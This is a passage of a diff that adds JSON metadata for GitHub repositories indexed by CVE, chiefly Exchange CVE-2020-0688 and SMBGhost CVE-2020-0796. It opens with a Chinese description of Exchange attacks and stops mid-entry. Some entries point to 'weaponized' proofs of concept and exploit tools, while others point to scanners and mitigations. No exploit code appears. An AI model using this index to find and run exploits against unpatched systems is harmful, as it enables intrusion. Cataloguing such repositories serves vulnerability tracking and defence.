"事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻擊事故。 嚴重性: 全球企業普遍使用微軟生態系執行日常業務,若遭受駭客攻擊,將造成用戶機敏資料外洩並導致極大損失。雖然微軟已推出更新補釘,但阿戴爾強調這尚未去除儲存在受害伺服器內的後門殼層(webshell),因此就算尚未受到攻擊的企業可以免於被駭風險,駭客仍有時間入侵已被駭的伺服器留下「定時炸彈」。 從2020年開始,美國便不斷指控中國入侵多家醫藥公司及學術單位,試圖竊取疫苗研發機密,這次事件很可能將使中美之間的關係進一步惡化。至於華為、TikTok等中國服務是否會受到這次駭客事件波及,則暫時還不明朗。 漏洞通報程序: 在2年前,曾經拿下資安圈漏洞奧斯卡獎Pwnie Awards「最佳伺服器漏洞獎」戴夫寇爾首席資安研究員Orange Tsai(蔡政達),漏洞通報記錄不勝枚舉,後來因為針對企業常用的SSL VPN進行漏洞研究與通報,更是在全球資安圈聲名大噪。 不過,在今年3月2日卻發生讓Orange Tsai錯愕不已的事情。那就是,他在今年一月跟微軟通報的2個Exchange漏洞,微軟原訂在3月9日對外釋出修補程式,卻突然提前一週,在3月2日便緊急釋出修補程式。原來是因為,在2月26日到2月28日,這個週五下班後到週末這段期間,全球各地發生許多利用微軟Exchange漏洞發動攻擊的資安事件。 攻擊本質: 有人在網路上大量掃描微軟於本月修補的CVE-2020-0688安全漏洞,該漏洞攸關Microsoft Exchange伺服器,呼籲Exchange用戶應儘速修補。 CVE-2020-0688漏洞肇因於Exchange伺服器在安裝時沒能妥善建立唯一金鑰,將允許具備該知識及信箱的授權用戶以系統權限傳遞任意物件,屬於遠端程式攻擊漏洞,該漏洞影響Microsoft Exchange Server 2010 SP3、Microsoft Exchange Server 2013、Microsoft Exchange Server 2016與Microsoft Exchange Server 2019,但只被微軟列為重要(Important)等級的風險。", + "fork": false, + "created_at": "2021-05-03T09:44:25Z", + "updated_at": "2021-05-03T09:52:40Z", + "pushed_at": "2021-05-03T09:44:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491348099, + "name": "CVE-2020-0688", + "full_name": "7heKnight\/CVE-2020-0688", + "owner": { + "login": "7heKnight", + "id": 60308445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60308445?v=4", + "html_url": "https:\/\/github.com\/7heKnight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7heKnight\/CVE-2020-0688", + "description": "CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability", + "fork": false, + "created_at": "2022-05-12T03:17:35Z", + "updated_at": "2023-12-04T03:36:05Z", + "pushed_at": "2022-06-03T06:34:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0688" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 554151760, + "name": "CVE-2020-0688-Python3", + "full_name": "1337-llama\/CVE-2020-0688-Python3", + "owner": { + "login": "1337-llama", + "id": 71475034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71475034?v=4", + "html_url": "https:\/\/github.com\/1337-llama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337-llama\/CVE-2020-0688-Python3", + "description": "Exploit updated to use Python 3.", + "fork": false, + "created_at": "2022-10-19T10:36:10Z", + "updated_at": "2022-10-20T10:29:58Z", + "pushed_at": "2023-10-26T18:56:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0688" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673661773, + "name": "CVE-2020-0688-Exchange2010", + "full_name": "chudamax\/CVE-2020-0688-Exchange2010", + "owner": { + "login": "chudamax", + "id": 11056491, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11056491?v=4", + "html_url": "https:\/\/github.com\/chudamax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chudamax\/CVE-2020-0688-Exchange2010", + "description": "CVE-2020-0688 modified exploit for Exchange 2010 ", + "fork": false, + "created_at": "2023-08-02T06:25:06Z", + "updated_at": "2024-08-12T20:32:19Z", + "pushed_at": "2023-08-02T06:36:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798271214, + "name": "CVE-2020-0688-GUI", + "full_name": "W01fh4cker\/CVE-2020-0688-GUI", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2020-0688-GUI", + "description": "GUI Exploit Tool for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability)", + "fork": false, + "created_at": "2024-05-09T12:50:48Z", + "updated_at": "2024-10-28T01:25:49Z", + "pushed_at": "2024-05-09T13:51:27Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0688", + "exchange", + "exploit", + "gui", + "redteam", + "redteam-tools" + ], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0728.json b/2020/CVE-2020-0728.json new file mode 100644 index 0000000000..394fe32935 --- /dev/null +++ b/2020/CVE-2020-0728.json @@ -0,0 +1,33 @@ +[ + { + "id": 240129027, + "name": "CVE-2020-0728", + "full_name": "irsl\/CVE-2020-0728", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2020-0728", + "description": "Proof of Concept code for CVE-2020-0728", + "fork": false, + "created_at": "2020-02-12T22:32:28Z", + "updated_at": "2024-08-12T19:57:42Z", + "pushed_at": "2020-02-12T22:50:22Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 46, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0753.json b/2020/CVE-2020-0753.json new file mode 100644 index 0000000000..136cf96cc5 --- /dev/null +++ b/2020/CVE-2020-0753.json @@ -0,0 +1,64 @@ +[ + { + "id": 242349988, + "name": "CVE-2020-0753-and-CVE-2020-0754", + "full_name": "afang5472\/CVE-2020-0753-and-CVE-2020-0754", + "owner": { + "login": "afang5472", + "id": 18503100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18503100?v=4", + "html_url": "https:\/\/github.com\/afang5472", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afang5472\/CVE-2020-0753-and-CVE-2020-0754", + "description": "Writeup and POC for CVE-2020-0753, CVE-2020-0754 and six fixed Window DOS Vulnerabilities.", + "fork": false, + "created_at": "2020-02-22T13:53:22Z", + "updated_at": "2024-08-12T19:58:00Z", + "pushed_at": "2020-04-15T17:41:44Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 242502226, + "name": "CVE-2020-0753-and-CVE-2020-0754", + "full_name": "VikasVarshney\/CVE-2020-0753-and-CVE-2020-0754", + "owner": { + "login": "VikasVarshney", + "id": 3353731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3353731?v=4", + "html_url": "https:\/\/github.com\/VikasVarshney", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VikasVarshney\/CVE-2020-0753-and-CVE-2020-0754", + "description": "Writeup and POC for CVE-2020-0753, CVE-2020-0754 and six unfixed Window DOS Vulnerabilities.", + "fork": false, + "created_at": "2020-02-23T11:10:49Z", + "updated_at": "2024-08-12T19:58:01Z", + "pushed_at": "2020-02-22T13:57:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0787.json b/2020/CVE-2020-0787.json new file mode 100644 index 0000000000..e4a84573fe --- /dev/null +++ b/2020/CVE-2020-0787.json @@ -0,0 +1,126 @@ +[ + { + "id": 272659155, + "name": "CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", + "full_name": "cbwang505\/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", + "owner": { + "login": "cbwang505", + "id": 4487329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4487329?v=4", + "html_url": "https:\/\/github.com\/cbwang505", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbwang505\/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", + "description": "Support ALL Windows Version", + "fork": false, + "created_at": "2020-06-16T08:57:51Z", + "updated_at": "2024-10-29T15:29:52Z", + "pushed_at": "2020-09-11T07:38:22Z", + "stargazers_count": 712, + "watchers_count": 712, + "has_discussions": false, + "forks_count": 172, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 172, + "watchers": 712, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 320526580, + "name": "CVE-2020-0787", + "full_name": "MasterSploit\/CVE-2020-0787", + "owner": { + "login": "MasterSploit", + "id": 74764997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74764997?v=4", + "html_url": "https:\/\/github.com\/MasterSploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterSploit\/CVE-2020-0787", + "description": null, + "fork": false, + "created_at": "2020-12-11T09:27:34Z", + "updated_at": "2020-12-11T09:27:34Z", + "pushed_at": "2020-12-11T09:27:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 320527396, + "name": "CVE-2020-0787-BitsArbitraryFileMove-master", + "full_name": "MasterSploit\/CVE-2020-0787-BitsArbitraryFileMove-master", + "owner": { + "login": "MasterSploit", + "id": 74764997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74764997?v=4", + "html_url": "https:\/\/github.com\/MasterSploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterSploit\/CVE-2020-0787-BitsArbitraryFileMove-master", + "description": null, + "fork": false, + "created_at": "2020-12-11T09:31:06Z", + "updated_at": "2020-12-11T09:31:06Z", + "pushed_at": "2020-12-11T09:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 428621250, + "name": "CVE-2020-0787", + "full_name": "yanghaoi\/CVE-2020-0787", + "owner": { + "login": "yanghaoi", + "id": 21354684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21354684?v=4", + "html_url": "https:\/\/github.com\/yanghaoi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanghaoi\/CVE-2020-0787", + "description": "CVE-2020-0787的简单回显", + "fork": false, + "created_at": "2021-11-16T11:04:42Z", + "updated_at": "2024-11-25T09:10:49Z", + "pushed_at": "2022-02-20T12:18:33Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0796.json b/2020/CVE-2020-0796.json new file mode 100644 index 0000000000..7430e77429 --- /dev/null +++ b/2020/CVE-2020-0796.json @@ -0,0 +1,2455 @@ +[ + { + "id": 222744850, + "name": "PyLadon", + "full_name": "k8gege\/PyLadon", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/PyLadon", + "description": "Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability \/ exploit \/ detection \/ MS17010\/SmbGhost\/CVE-2020-0796\/CVE-2018-2894", + "fork": false, + "created_at": "2019-11-19T16:51:39Z", + "updated_at": "2024-10-29T08:00:38Z", + "pushed_at": "2020-12-08T15:39:24Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 51, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 246414113, + "name": "CVE-2020-0796-PoC", + "full_name": "0x25bit\/CVE-2020-0796-PoC", + "owner": { + "login": "0x25bit", + "id": 36723956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36723956?v=4", + "html_url": "https:\/\/github.com\/0x25bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x25bit\/CVE-2020-0796-PoC", + "description": "Weaponized PoC for SMBv3 TCP codec\/compression vulnerability", + "fork": false, + "created_at": "2020-03-10T21:40:57Z", + "updated_at": "2024-08-12T19:58:35Z", + "pushed_at": "2020-04-01T19:34:36Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 246467738, + "name": "DisableSMBCompression", + "full_name": "technion\/DisableSMBCompression", + "owner": { + "login": "technion", + "id": 1948596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948596?v=4", + "html_url": "https:\/\/github.com\/technion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/technion\/DisableSMBCompression", + "description": "CVE-2020-0796 Flaw Mitigation - Active Directory Administrative Templates", + "fork": false, + "created_at": "2020-03-11T03:43:29Z", + "updated_at": "2024-08-12T19:58:36Z", + "pushed_at": "2020-03-11T04:57:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 246525183, + "name": "CVE-2020-0796", + "full_name": "T13nn3s\/CVE-2020-0796", + "owner": { + "login": "T13nn3s", + "id": 29333776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29333776?v=4", + "html_url": "https:\/\/github.com\/T13nn3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T13nn3s\/CVE-2020-0796", + "description": "Powershell SMBv3 Compression checker", + "fork": false, + "created_at": "2020-03-11T09:13:48Z", + "updated_at": "2024-08-12T19:58:36Z", + "pushed_at": "2023-04-01T11:47:46Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 246606759, + "name": "SMBGhost", + "full_name": "ly4k\/SMBGhost", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/SMBGhost", + "description": "Scanner for CVE-2020-0796 - SMBv3 RCE", + "fork": false, + "created_at": "2020-03-11T15:21:27Z", + "updated_at": "2024-11-26T23:51:11Z", + "pushed_at": "2020-10-01T08:36:29Z", + "stargazers_count": 666, + "watchers_count": 666, + "has_discussions": false, + "forks_count": 199, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796" + ], + "visibility": "public", + "forks": 199, + "watchers": 666, + "score": 0, + "subscribers_count": 26 + }, + { + "id": 246621836, + "name": "CVE-2020-0796-Checker", + "full_name": "joaozietolie\/CVE-2020-0796-Checker", + "owner": { + "login": "joaozietolie", + "id": 26208666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26208666?v=4", + "html_url": "https:\/\/github.com\/joaozietolie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaozietolie\/CVE-2020-0796-Checker", + "description": "Script that checks if the system is vulnerable to CVE-2020-0796 (SMB v3.1.1)", + "fork": false, + "created_at": "2020-03-11T16:23:03Z", + "updated_at": "2024-08-12T19:58:38Z", + "pushed_at": "2020-03-11T22:50:40Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 246652992, + "name": "cve-2020-0796", + "full_name": "ButrintKomoni\/cve-2020-0796", + "owner": { + "login": "ButrintKomoni", + "id": 10991703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10991703?v=4", + "html_url": "https:\/\/github.com\/ButrintKomoni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ButrintKomoni\/cve-2020-0796", + "description": "Identifying and Mitigating the CVE-2020–0796 flaw in the fly", + "fork": false, + "created_at": "2020-03-11T18:42:32Z", + "updated_at": "2024-11-25T10:50:14Z", + "pushed_at": "2020-03-12T10:19:35Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2020-0796", + "microsoft", + "vulnerability-analysis" + ], + "visibility": "public", + "forks": 15, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246724151, + "name": "cve-2020-0796-scanner", + "full_name": "dickens88\/cve-2020-0796-scanner", + "owner": { + "login": "dickens88", + "id": 8390209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8390209?v=4", + "html_url": "https:\/\/github.com\/dickens88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dickens88\/cve-2020-0796-scanner", + "description": "This project is used for scanning cve-2020-0796 SMB vulnerability", + "fork": false, + "created_at": "2020-03-12T02:20:07Z", + "updated_at": "2024-08-12T19:58:39Z", + "pushed_at": "2020-03-12T02:49:10Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 246728549, + "name": "CVE-2020-0796", + "full_name": "kn6869610\/CVE-2020-0796", + "owner": { + "login": "kn6869610", + "id": 6917744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6917744?v=4", + "html_url": "https:\/\/github.com\/kn6869610", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn6869610\/CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-03-12T02:47:49Z", + "updated_at": "2024-08-12T19:58:39Z", + "pushed_at": "2020-03-12T03:19:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246795620, + "name": "eternalghosttest", + "full_name": "awareseven\/eternalghosttest", + "owner": { + "login": "awareseven", + "id": 53170037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53170037?v=4", + "html_url": "https:\/\/github.com\/awareseven", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awareseven\/eternalghosttest", + "description": "This repository contains a test case for CVE-2020-0796", + "fork": false, + "created_at": "2020-03-12T09:35:57Z", + "updated_at": "2024-08-12T19:58:40Z", + "pushed_at": "2022-08-30T07:26:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 246870588, + "name": "CVE-2020-0796-Scanner", + "full_name": "xax007\/CVE-2020-0796-Scanner", + "owner": { + "login": "xax007", + "id": 44893059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44893059?v=4", + "html_url": "https:\/\/github.com\/xax007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xax007\/CVE-2020-0796-Scanner", + "description": "CVE-2020-0796 SMBv3.1.1 Compression Capability Vulnerability Scanner", + "fork": false, + "created_at": "2020-03-12T15:36:43Z", + "updated_at": "2024-08-12T19:58:43Z", + "pushed_at": "2020-03-12T15:46:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246883669, + "name": "Scanners-for-CVE-2020-0796-Testing", + "full_name": "Dhoomralochana\/Scanners-for-CVE-2020-0796-Testing", + "owner": { + "login": "Dhoomralochana", + "id": 56705549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56705549?v=4", + "html_url": "https:\/\/github.com\/Dhoomralochana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dhoomralochana\/Scanners-for-CVE-2020-0796-Testing", + "description": "Scanners List - Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796) ", + "fork": false, + "created_at": "2020-03-12T16:39:41Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-12T16:44:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 246894204, + "name": "smbee", + "full_name": "UraSecTeam\/smbee", + "owner": { + "login": "UraSecTeam", + "id": 23280827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23280827?v=4", + "html_url": "https:\/\/github.com\/UraSecTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UraSecTeam\/smbee", + "description": "Check system is vulnerable CVE-2020-0796 (SMB v3)", + "fork": false, + "created_at": "2020-03-12T17:32:56Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-12T17:42:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "coronablue", + "cve-2020-0796", + "smbghost" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246900063, + "name": "SMBGhost", + "full_name": "netscylla\/SMBGhost", + "owner": { + "login": "netscylla", + "id": 25352732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25352732?v=4", + "html_url": "https:\/\/github.com\/netscylla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netscylla\/SMBGhost", + "description": "SMBGhost (CVE-2020-0796) threaded scanner", + "fork": false, + "created_at": "2020-03-12T18:03:45Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-12T22:20:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246905632, + "name": "CVE-2020-0796-PoC", + "full_name": "eerykitty\/CVE-2020-0796-PoC", + "owner": { + "login": "eerykitty", + "id": 10905603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10905603?v=4", + "html_url": "https:\/\/github.com\/eerykitty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eerykitty\/CVE-2020-0796-PoC", + "description": "PoC for triggering buffer overflow via CVE-2020-0796", + "fork": false, + "created_at": "2020-03-12T18:34:40Z", + "updated_at": "2024-10-29T21:41:51Z", + "pushed_at": "2023-02-26T07:01:03Z", + "stargazers_count": 321, + "watchers_count": 321, + "has_discussions": false, + "forks_count": 121, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "coronablue", + "cve-2020-0796", + "poc", + "smbghost" + ], + "visibility": "public", + "forks": 121, + "watchers": 321, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 246914011, + "name": "SMBCompScan", + "full_name": "wneessen\/SMBCompScan", + "owner": { + "login": "wneessen", + "id": 542696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/542696?v=4", + "html_url": "https:\/\/github.com\/wneessen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wneessen\/SMBCompScan", + "description": "Scanner script to identify hosts vulnerable to CVE-2020-0796", + "fork": false, + "created_at": "2020-03-12T19:22:36Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-12T21:40:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246915801, + "name": "SMBGhost", + "full_name": "ioncodes\/SMBGhost", + "owner": { + "login": "ioncodes", + "id": 18533297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18533297?v=4", + "html_url": "https:\/\/github.com\/ioncodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioncodes\/SMBGhost", + "description": "Scanner for CVE-2020-0796 - A SMBv3.1.1 + SMB compression RCE ", + "fork": false, + "created_at": "2020-03-12T19:33:18Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-13T07:38:43Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 56, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 246918199, + "name": "CVE-2020-0796", + "full_name": "laolisafe\/CVE-2020-0796", + "owner": { + "login": "laolisafe", + "id": 45027935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45027935?v=4", + "html_url": "https:\/\/github.com\/laolisafe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laolisafe\/CVE-2020-0796", + "description": "SMBv3 RCE vulnerability in SMBv3", + "fork": false, + "created_at": "2020-03-12T19:46:25Z", + "updated_at": "2024-08-12T19:58:44Z", + "pushed_at": "2020-03-13T05:36:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246921709, + "name": "SMBScanner", + "full_name": "gabimarti\/SMBScanner", + "owner": { + "login": "gabimarti", + "id": 1541061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1541061?v=4", + "html_url": "https:\/\/github.com\/gabimarti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gabimarti\/SMBScanner", + "description": "Multithread SMB scanner to check CVE-2020-0796 for SMB v3.11", + "fork": false, + "created_at": "2020-03-12T20:07:44Z", + "updated_at": "2024-08-12T19:58:45Z", + "pushed_at": "2020-08-20T15:59:58Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "python3", + "smb", + "smb311", + "smbghost", + "vuln", + "vulnerability" + ], + 